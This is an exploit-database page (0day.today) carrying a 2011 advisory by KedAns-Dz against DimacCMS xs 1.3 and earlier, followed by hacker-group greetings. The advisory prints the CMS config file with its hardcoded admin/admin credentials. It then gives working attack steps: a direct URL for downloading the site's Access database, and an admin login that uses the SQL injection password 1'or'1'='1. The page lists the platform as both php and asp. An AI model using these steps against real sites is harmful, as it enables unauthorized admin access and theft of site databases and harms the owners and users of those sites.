[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DimacCMS xs <=1.3 Multiple Vulnerability

Author
KedAns-Dz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15829
Category
web applications
Date add
12-04-2011
Platform
php
###
# Title : DimacCMS xs <=1.3 Multiple Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : asp
# Impact : Database Download / Bypass
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com)
###
[+] http://[localhost]/[path]/GlobalResources/scripts/GlobalData.asp << Admin Config Info
# Vulnerability in File 'GlobalData.asp' :
<!--#include file = "Lang_File.asp"-->
<%
 '----------------------------------------------------------------------------------------
 ' Site Constants
 '----------------------------------------------------------------------------------------
 SiteUseFrames = TRUE   ' // Valid are [ FALSE | TRUE ]
 AdminUserName  = "admin"  ' // << Username Here
 AdminPassword = "admin"  ' // << Password Here
 '----------------------------------------------------------------------------------------
 ' Function GetConnStr
 '----------------------------------------------------------------------------------------
 Function GetConStr(dbPath)
  p = dbPath & "Database\[Database-name].mdb"
  GetConStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(p)  
 End Function
%>

# Exploit :
[1] http://[localhost]/[path]/SiteResources/Data/Database/database.mdb << Download DB
[2] http://[localhost]/[path]/CMSadmin/default.asp >>
Username : admin
Password : 1'or'1'='1  | Password : admin  << or See Admin Config
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * jos_ali_joe (exploit-id.com) * r0073rt (Inj3ct0r.com) * TreX (hotturks.org)
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * KelvinX (kelvinx.net)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.1337day.com * exploit-id.com * www.packetstormsecurity.org *  bugsearch.net
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================



#  0day.today [2024-09-29]  #